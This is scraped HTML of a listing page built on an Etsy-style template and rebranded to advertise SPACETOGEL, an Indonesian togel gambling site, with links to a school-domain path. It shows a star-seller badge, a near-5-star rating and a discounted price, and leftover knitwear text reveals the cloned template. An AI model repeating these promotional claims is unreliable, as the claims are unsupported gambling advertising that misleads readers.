                        <span class="wt-icon wt-icon--smallest"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M10,2a8,8,0,1,0,8,8A8.009,8.009,0,0,0,10,2Zm0,14a6,6,0,1,1,6-6A6.007,6.007,0,0,1,10,16Z"/><path d="M14,9H11V6A1,1,0,1,0,9,6V9H6a1,1,0,0,0,0,2H9v3a1,1,0,1,0,2,0V11h3A1,1,0,0,0,14,9Z"/><path d="M21.707,20.293l-4-4a1,1,0,0,0-1.414,1.414l4,4A1,1,0,0,0,21.707,20.293Z"/></svg></span>
                    Click to zoom

</span>
                </div>
            </ul>
        </div>
            <div class="wt-overflow-y-auto wt-position-relative image-overlay-thumbnail-container wt-z-index-1 wt-pt-xs-10"
            data-thumbnail-container>
                        <ul
                            data-image-overlay-thumbnail-list
                            class="wt-z-index-1 wt-list-unstyled wt-flex-direction-row-lg wt-flex-direction-column-xs wt-display-flex-xs wt-flex-wrap wt-align-content-flex-start"
                        >
                                <li
                                    data-index="0"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6845617078"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 1"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                    <li
                                        data-index="1"
                                        class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                        tabindex="0"
                                        data-image-id="listing-video-1"
                                        data-listing-video="true"
                                    >
                                        <div class="wt-position-relative wt-height-full">
                                            <img class="wt-skeleton-ui"
                                                data-carousel-thumbnail-image
                                                src=""
                                                data-src-delay="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                            />

                                            <div class="wt-circle wt-overflow-hidden video-thumbnail-icon wt-position-top wt-position-bottom wt-position-right wt-position-left wt-bg-white wt-shadow-elevation-3">
                                                <span class="etsy-icon video-thumbnail-icon__with-image wt-position-top wt-position-bottom wt-position-right"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><polygon points="4 4 4 20 20 12 4 4"/></svg></span>
                                            </div>
                                        </div>
                                    </li>
                                <li
                                    data-index="2"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6354031418"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 2"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="3"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6402117407"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 3"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="4"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6354386589"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 4"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="5"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6285298756"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="name yarn jumper for kids"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="6"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6430051759"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 6"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="7"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="7056312285"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 7"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="8"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6332997945"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 8"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="9"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6722497805"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 9"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                                <li
                                    data-index="10"
                                    class="wt-rounded wt-overflow-hidden image-overlay-thumbnail wt-mb-xs-2"
                                    tabindex="0"
                                    data-image-id="6356157787"
                                >
                                    <img class="wt-skeleton-ui"
                                        alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 10"
                                        data-carousel-thumbnail-image
                                        loading="lazy"
                                        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                                    />
                                </li>
                        </ul>
            </div>
    </div>
</div>
</div>
</div>

<div class="wt-display-flex-xs wt-justify-content-flex-end wt-mt-xs-3">
        <a class="wt-text-link wt-text-link-underline" href="https://ppschool.org.in/stella/">
        <span class="wt-icon wt-icon--smaller-xs wt-nudge-r-4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M7 3a1 1 0 0 0-2 0v18a1 1 0 1 0 2 0v-6h14.766l-3.6-6 3.6-6zm0 2v8h11.234l-2.4-4 2.4-4z"/></svg></span>SPACETOGEL
    </a>
    </div>
<div data-wt-overlay data-report-item-overlay id="report-item-overlay" class="wt-overlay wt-display-none" role="dialog" aria-hidden="true" aria-modal="false" aria-label ="report-item-overlay-title">
        <div class="wt-overlay__modal" data-overlay-modal>
            <button class="wt-btn wt-btn--icon wt-btn--tertiary wt-btn--light wt-overlay__close-icon" data-wt-overlay-close aria-label="Close">
                <span class="etsy-icon wt-icon--smaller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M13.414,12l6.293-6.293a1,1,0,0,0-1.414-1.414L12,10.586,5.707,4.293A1,1,0,0,0,4.293,5.707L10.586,12,4.293,18.293a1,1,0,1,0,1.414,1.414L12,13.414l6.293,6.293a1,1,0,0,0,1.414-1.414Z"/></svg></span>
            </button>
            <div data-report-item-form-container class="wt-display-none">
    <div class="wt-overlay__header report-item-step">
        <h2 class="wt-text-heading" id="report-item-overlay-title">Apa yang salah dengan daftar ini?</h2>
    </div>
    <div class="wt-overlay__header report-item-step wt-display-none">
        <h3 class="wt-text-heading" id="report-item-overlay-title-more">Add more details</h3>
        <h3 class="wt-text-body-01 wt-mt-xs-3">Bagikan informasi lebih spesifik untuk membantu kami meninjau item ini dan melindungi pasar kami.</h3>
    </div>
    <form data-report-item-form
          action="/add_report.php"
          method="post">
        <div class="report-item-step">
            <div class="wt-select wt-mb-xs-3">
                <select class="wt-select__element"
                        id="report-item-choices"
                        data-report-item-choices>
                    <optgroup>
                        <option value="default">Pilih alasan…</option>
                        <option value="order-problem">Ada masalah dengan pesanan saya</option>
                        <option value="ip-policy">Ini menggunakan kekayaan intelektual saya tanpa izin</option>
                        <option value="flag-item">Saya rasa itu tidak sesuai dengan kebijakan SPACETOGEL</option>
                    </optgroup>
                </select>
                <label for="report-item-choices" class="wt-screen-reader-only">Pilih alasan…</label>
            </div>
            <div data-report-choice="order-problem" id="order-problem" class="wt-display-none">
                <p class="wt-mb-xs-2 prose">Hal pertama yang harus Anda lakukan adalah menghubungi penjual secara langsung.</p>
                <p class="wt-mb-xs-2 ip-policy prose">Jika Anda sudah melakukannya, barang Anda belum sampai, atau tidak sesuai deskripsi, Anda dapat melaporkannya ke SPACETOGEL dengan membuka kasus.</p>
                <p class="wt-mb-xs-2 prose">
                    <a href="/help/article/5307" target="_blank">
                        Laporkan masalah dengan pesanan
                    </a>
                </p>
            </div>
            <div data-report-choice="ip-policy" id="ip-policy" class="wt-display-none">
                <p class="wt-mb-xs-2 prose">Kami menanggapi masalah kekayaan intelektual dengan sangat serius, tetapi banyak dari masalah ini dapat diselesaikan langsung oleh pihak-pihak yang terlibat. Kami sarankan Anda menghubungi penjual secara langsung untuk menyampaikan kekhawatiran Anda dengan hormat.</p>
                <p class="wt-mb-xs-2 prose">Jika Anda ingin mengajukan tuduhan pelanggaran, Anda harus mengikuti proses yang dijelaskan dalam <a href='/legal/ip' target='_blank'>Kebijakan Hak Cipta dan Kekayaan Intelektual</a>.</p>
            </div>
            <div data-report-choice="flag-item" id="flag-item" class="wt-display-none">
                <div class="wt-mb-xs-2">
                    <a href="/legal/sellers#allowed" target="_blank">
                        Tinjau bagaimana kami mendefinisikan barang buatan tangan, vintage, dan perlengkapan
                    </a>
                </div>
                <div class="wt-mb-xs-2">
                    <a href="/legal/prohibited" target="_blank">
                        Lihat daftar barang dan bahan terlarang
                    </a>
                </div>
                <div class="wt-mb-xs-4">
                    <a href="/legal/policy/listing-mature-content-correctly/242665462117" target="_blank">
                        Baca kebijakan konten dewasa kami
                    </a>
                </div>
                <div data-report-reason class="wt-validation">
                    <fieldset class="wt-mb-xs-4">
                        <legend class="wt-label wt-mb-xs-2">Beritahu kami mengapa Anda melaporkan item ini</legend>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="not_handmade_vintage_or_craft"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_not_handmade_vintage_or_craft"
                                        name="flag_type_mnemonic"
                                        value="LISTING_CSV_MEMBER_FLAG">
                                <label for="flag_not_handmade_vintage_or_craft">Ini bukan barang buatan tangan, vintage, atau kerajinan</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="pornographic"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_pornographic"
                                        name="flag_type_mnemonic"
                                        value="OC_PORNOGRAPHY">
                                <label for="flag_pornographic">Itu pornografi</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="hate_speech_or_harassment"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_hate_speech_or_harassment"
                                        name="flag_type_mnemonic"
                                        value="OC_HATE_VIOLENT_HARMFUL">
                                <label for="flag_hate_speech_or_harassment">Ini adalah ujaran kebencian atau pelecehan</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="minor_safety"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_minor_safety"
                                        name="flag_type_mnemonic"
                                        value="LISTING_MINOR_SAFETY">
                                <label for="flag_minor_safety">Ini adalah ancaman terhadap keselamatan anak di bawah umur</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="violence_or_self_harm"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_violence_or_self_harm"
                                        name="flag_type_mnemonic"
                                        value="OC_HATE_VIOLENT_HARMFUL">
                                <label for="flag_violence_or_self_harm">Ini mendorong kekerasan atau menyakiti diri sendiri</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="dangerous_or_hazardous"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_dangerous_or_hazardous"
                                        name="flag_type_mnemonic"
                                        value="LISTING_PROHIBITED">
                                <label for="flag_dangerous_or_hazardous">Itu berbahaya atau membahayakan</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="violates_law"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_violates_law"
                                        name="flag_type_mnemonic"
                                        value="CC_REPORTED_ILLEGAL_CONTENT">
                                <label for="flag_violates_law">Ini melanggar hukum atau peraturan tertentu</label>
                            </div>
                            <div class="wt-radio wt-mb-xs-1">
                                <input
                                        data-report-reason-input
                                        data-flag-name="violates_not_listed_policy"
                                        type="radio"
                                        class="wt-radio"
                                        id="flag_violates_not_listed_policy"
                                        name="flag_type_mnemonic"
                                        value="LISTING_PROHIBITED">
                                <label for="flag_violates_not_listed_policy">Ini melanggar kebijakan yang tidak tercantum di sini</label>
                            </div>
                        <div data-error="no-report-reason" id="no-report-reason" class="wt-validation__message wt-validation__message--is-hidden wt-sem-text-critical">Silakan pilih alasannya</div>
                    </fieldset>
                </div>
            </div>
        </div>
        <div class="report-item-step wt-display-none">
            <div data-report-comment class="wt-validation" tabindex="0">
                <label class="wt-screen-reader-only" for="report-item-reason">Sertakan hal lain yang perlu kami ketahui tentang item ini</label>
                <textarea id="report-item-reason" data-report-comment-input name="reason" class="wt-textarea" placeholder="Include anything else we should know about this item"></textarea>
                <div data-error="no-report-comment" id="no-report-comment" class="wt-validation__message wt-validation__message--is-hidden wt-sem-text-critical wt-mt-xs-2">
                    <span class="wt-icon wt-sem-text-on-surface-dark wt-validation__icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M11 6v8h2V6zm1 9.25a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5"/></svg></span>&nbsp;Pastikan untuk menambahkan lebih banyak rincian.
                </div>
                <div data-error="comment-min-length-illegal-content" id="comment-min-length-illegal-content" class="wt-validation__message wt-validation__message--is-hidden wt-sem-text-critical wt-mt-xs-2">
                    <span class="wt-icon wt-sem-text-on-surface-dark wt-validation__icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M11 6v8h2V6zm1 9.25a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5"/></svg></span>&nbsp;Tambahkan detail lebih lanjut, termasuk nama undang-undang atau peraturan (minimal 10 karakter).
                </div>
            </div>
        </div>
        <div data-report-bonafide class="wt-mt-xs-2 wt-mb-xs-2 wt-sem-text-secondary wt-display-none">
            Dengan mengirimkan laporan ini, Anda mengonfirmasi bahwa informasi dan klaim dalam formulir ini akurat.
        </div>
        <div data-report-item-overlay-footer class="wt-overlay__footer wt-pt-xs-0 wt-display-none" id="overlay-footer">
            <input type="hidden" name="_nnc" value="3:1757443933:IZCDEmL34NPkU3X48ZDZz8rZZPp4:9d62b7617187d17444be81b8f36c4dfb31d3884bb44f5aec3ebde05d24141848" class="hidden csrf" />
            <input type="hidden"
                   name="target_id"
                   value="4302118744"/>
            <input type="hidden"
                   name="target_type"
                   value="listing"/>
            <input type='hidden'
                   name='send_report'
                   value='true'/>
            <input type='hidden'
                   name='ref'
                   value="unknown"/>
            <input type='hidden'
                   name='platform'
                   value="web"/>
            <input type='hidden'
                   name='search_query'
                   value=""/>
            <div class="wt-overlay__footer__cancel">
                <button data-report-back-button type="button"
                        class="wt-btn wt-btn-transparent report-item-step wt-display-none">
                    Go back
                </button>
            </div>
            <div class="wt-overlay__footer__action">
                <button data-report-next-button type="button"
                        class="wt-btn wt-btn--primary report-item-step">
                    Next
                </button>
                <button data-report-submit-button type="submit"
                        class="wt-btn wt-btn--primary report-item-step wt-display-none">
                    Submit report
                </button>
            </div>
        </div>
    </form>
</div>
        </div>
    </div>
                        </div>
                    </div>
                    <div class="cart-col wt-order-xs-2 wt-mb-lg-5">
    <div id="listing-page-cart" class="wt-display-flex-lg wt-flex-direction-column-md wt-flex-lg-3 wt-pl-md-4 wt-pr-md-4 wt-pl-lg-0 wt-pr-lg-5 wt-pl-xs-2 wt-pr-xs-2">
            <div class="wt-mb-xs-1 wt-mt-xs-1">
                <div data-appears-component-name="SPACETOGEL-Modules-ListingPage-UrgencySignal-RecsRankingApiSpec" data-appears-event-data='{"module_placement":"lp_urgency_signals","datasets":["Common_Signal_CustomCandidatesSignalRankerV3"],"targets":[],"logging_class":"SPACETOGEL\\Modules\\ListingPage\\UrgencySignal\\RecsRankingApiSpec","page_listing_id":4302118744,"mmx_request_uuid_map":{"5143dd58-1944-4e40-8b7e-02b5b89c59ea":[0,1,2]},"candidate_source_map":{"signals-ranker-v3-extractor":[0,1,2]},"second_pass_ranker_map":{"signals-ranker-v3":[0,1,2]},"client_provided_features":{"browser":{"acceptLanguage":"en-US","browser":"Chrome","currency":"IDR","localeRegion":"ID","operatingSystem":"Windows 11","platform":"desktop","platformSPACETOGELApp":"web","platformMobileDevice":"unidentified","source":"directLanding"},"date_time":{"dayOfWeek":"2","hourOfDay":"18"},"user":{"locationLatitude":null,"locationLongitude":null,"locationZip":"unidentified","userPreferredLanguage":"en-US"}},"scores":[0.58056300000000005123723667566082440316677093505859375,0.48064099999999998491517771981307305395603179931640625,0.37174099999999998811262003073352389037609100341796875],"datasets_map":{"Common_Signal_CustomCandidatesSignalRankerV3":[0,1,2]},"target_listing_id":4302118744,"candidates":["recently_purchased","in_cart_only","lp_views_only"],"refTag":"lp_urgency_signals","signals":["recently_purchased","in_cart_only","lp_views_only"],"rec_event_name":"recommendations_module"}' class='recs-appears-logger'>
</div>
            </div>
        <div class="wt-display-flex-xs wt-align-items-center">
            <div data-appears-component-name="price">
<div class="wt-display-flex-xs wt-align-items-center wt-flex-wrap"
     data-selector="price-only"
     data-buy-box-region="price"
>
        <p class="wt-text-title-larger wt-mr-xs-1
                wt-text-slime
            "
        >
        <span class="wt-screen-reader-only">Harga :</span>
        Rp 5,000
    </p>
        <p class="wt-text-caption wt-sem-text-secondary">
            <span class="wt-screen-reader-only">Normal:</span>
            <span class="wt-text-strikethrough  ">
                Rp 100,000+
            </span>
        </p>
        
    <div data-clg-id="WtSpinner" class="wt-spinner wt-spinner--01 wt-display-none" aria-live="assertive" data-buy-box-price-spinner="">
        <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle fill="transparent" cx="12" cy="12" r="10"/></svg></span>
        Loading
    </div>

</div>
</div>
                                <div class="wt-ml-xs-2">
                                    <span data-clg-id="WtBadge" class="wt-badge wt-badge--statusValue">
        <strong>95%</strong>

</span>
                                </div>
        </div>
                <div class="wt-mb-xs-1  ">
                        <div id="sale-ending-soon-countdown">
    <p class="wt-text-title-01 wt-sem-text-monetary-value" data-24-hour-sale-wrapper>
  <span class="listing-24-sale-countdown" data-end-date="1757519999">Diskon Setiap Hari Untuk Setiap Pengguna</span>
</p>

</div>
                    
                </div>
        
        <div data-buy-box-region="vat_messaging">
        <div class="wt-sem-text-secondary wt-text-caption wt-pt-xs-1 wt-pb-xs-1">
            Tanpa Syarat dan ketentuan
        </div>
</div>
        
        
            <div class="wt-mt-xs-1 wt-mb-xs-1">
            </div>
        <div class="wt-mb-xs-3">
            <div class="wt-display-inline-flex-xs wt-align-items-center wt-flex-wrap lp-shop-header">
    <div class="wt-display-inline-flex-xs wt-align-items-center
        
    ">
        <span class="wt-text-title-small">
    <a href="https://ppschool.org.in/stella/" class="wt-text-link-no-underline wt-sem-text-primary">
        SPACETOGEL
    </a>
</span>
            &nbsp;<div class="wt-popover star-seller-badge-listing-page" data-wt-popover>
    <button data-wt-popover-trigger class="wt-popover__trigger wt-popover__trigger--underline" aria-label="Star Seller" aria-describedby="star-seller-popover">
        <span class="wt-icon wt-icon--smaller-xs wt-icon--core wt-fill-star-seller-dark" alt="star_seller"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="m20.902 7.09-2.317-1.332-1.341-2.303H14.56L12.122 2 9.805 3.333H7.122L5.78 5.758 3.341 7.09v2.667L2 12.06l1.341 2.303v2.666l2.318 1.334L7 20.667h2.683L12 22l2.317-1.333H17l1.342-2.303 2.317-1.334v-2.666L22 12.06l-1.341-2.303V7.09zm-6.097 6.062.732 3.515-.488.363-2.927-1.818-3.049 1.697-.488-.363.732-3.516-2.56-2.181.121-.485 3.537-.243 1.341-3.273h.488l1.341 3.273 3.537.243.122.484z"/></svg></span>
    </button>
    <div class="wt-p-xs-3" id="star-seller-popover" role="tooltip">
        <p class="wt-mb-xs-1 wt-text-title-01">
            Star Seller
        </p>
    </div>
</div>
    </div>
        <div class="wt-ml-xs-1">
            <div class="wt-text-link-no-underline review-stars-text-decoration-none">
    <a href="#reviews" data-click-source="review_stars" aria-label="4.9 out of 5 stars. See reviews."><span class="wt-display-inline-block wt-mr-xs-1" data-stars-svg-container>
    <input type="hidden" name="initial-rating" value="4.8554" />
    <input type="hidden" name="rating" value="4.8554" />
    <span class="wt-screen-reader-only">5 out of 5 stars</span>

    <span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
            <span class="wt-icon wt-nudge-b-1 wt-icon--smallest" data-rating="4"><svg xmlns="http://www.w3.org/2000/svg" viewBox="3 3 18 18" aria-hidden="true" focusable="false"><path d="M20.83,9.15l-6-.52L12.46,3.08h-.92L9.18,8.63l-6,.52L2.89,10l4.55,4L6.08,19.85l.75.55L12,17.3l5.17,3.1.75-.55L16.56,14l4.55-4Z"/></svg></span>
    </span>
</span></a>
</div>
        </div>
    
</div>
        </div>
        <div class="wt-mb-xs-6 wt-mb-lg-0">
            <div data-buy-box>
    <div class="wt-mb-xs-3">
        
        
        <div data-appears-component-name="variations">
<div data-selector="listing-page-variations">
    <div
    class="wt-validation wt-mb-xs-2"
    data-selector="listing-page-variation"
    data-variation-number="0"
>

</button>
</div>
        </form>
        

        </div>

</div>
</div>
                </div>
        </div>
        
    </div>
</div>
<div class="listing-info info-col description-right wt-order-xs-5">
    <div class="wt-flex-lg-3 wt-order-xs-1 wt-order-lg-3 wt-max-width-full wt-pl-md-4 wt-pr-md-4 wt-pl-lg-0 wt-pr-lg-5 wt-pl-xs-2 wt-pr-xs-2">
            <div data-appears-component-name="product_details">
<div id="product_details">
    <div class="wt-content-toggle " data-selector="info-section-content-toggle">
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-content-toggle--btn wt-content-toggle--with-icon wt-width-full wt-content-toggle--flush" data-wt-content-toggle="true" data-animate="true" data-default-open="true" aria-controls="product_details_content_toggle">
                <span class="wt-flex-xs-auto wt-width-full wt-text-title">
                <h2>
                    Item details
                </h2>
            </span>
            <span class="wt-content-toggle--btn__icon"></span>

</button>

        <div id="product_details_content_toggle"
             class="wt-content-toggle__body"
             aria-hidden="false"
        >
            <div 
                class="wt-mb-xs-6"
            >
                <div class="wt-mt-xs-2">
    <h3 class="wt-text-title">Highlights</h3>
    <ul
        class="wt-block-grid-xs-1 wt-text-body-01 show-icons wt-mt-xs-1 wt-pl-xs-0 wt-mb-xs-3"
        data-selector ="product-details-highlights"
        >
        <div data-appears-component-name="how_its_made_label" data-appears-event-data='{"label_type":"seller_designed","section":"product_details"}'>
<li class="wt-block-grid__item wt-display-flex-xs wt-align-items-flex-start">
            <div><span class="wt-icon wt-nudge-b-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M4.5 8v7H3v5h5v-1.25h2.5v-2H8V15H6.5V8H8V6.5h7V8h1.75v2.457l2 1.714V8H20V3h-5v1.5H8V3H3v5z"/><path d="m12.39 9.129 9.273 7.971-4.17.29 1.378 3-2.272 1.043-1.36-2.962-2.854 2.887z"/></svg></span></div>
        <div class="wt-ml-xs-1 how-its-made-label-product-details">
                Designed by <a href="https://ppschool.org.in/stella/"target="_blank" class="wt-text-link-no-underline wt-text-title"> SPACETOGEL</a>
        </div>
</li>
</div>
        <li class="wt-block-grid__item wt-display-flex-xs wt-align-items-flex-start">
    <div><span class="wt-icon wt-nudge-b-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M18.1 6c.7 1.7.9 3.6.4 5.6-.8 3.4-3.5 6.1-6.9 6.9-2 .5-3.9.2-5.6-.4v1.4L7.5 21h12l1.5-1.5v-12L19.5 6h-1.4z"/><path d="M9.5 2C5.4 2 2 5.4 2 9.5S5.4 17 9.5 17 17 13.6 17 9.5 13.6 2 9.5 2zM7.8 15c-.6-.2-1.2-.5-1.7-.9l8-8c.4.5.7 1.1.9 1.7L7.8 15zm3.4-11c.6.2 1.2.5 1.7.9l-8 8c-.4-.5-.7-1.1-.9-1.7L11.2 4zM9 3.8L3.8 9C4 6.2 6.2 4 9 3.8zm1 11.4l5.2-5.2c-.2 2.8-2.4 5-5.2 5.2z"/></svg></span></div>
    <div class="wt-width-full wt-max-width-full wt-ml-xs-1">
<div data-clg-id="WtInlineToggle" class="wt-content-toggle--truncated-inline-single wt-text-body-01">
    <div class="wt-content-toggle__trigger-wrapper">
        <button
                type="button"
                class="wt-content-toggle--ellipsis-btn"
                data-one-way="false"
                data-wt-content-toggle
                data-inline="single"
                aria-controls="legacy-materials-product-details"
        >
            <span class="etsy-icon wt-icon--base-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="12" cy="12.001" r="2.999"/><circle cx="3" cy="12.001" r="2.999"/><circle cx="21" cy="12.001" r="2.999"/></svg></span>
            <span class="wt-screen-reader-only">Read the full description</span>
        </button>
    </div>

    <p id="legacy-materials-product-details" class="wt-text-truncate wt-text-body-01" >
                    Materials: Cotton, Knit

    </p>
</div>
    </div>
</li>
        
        
        
        <li class="wt-block-grid__item wt-display-flex-xs wt-align-items-flex-start">
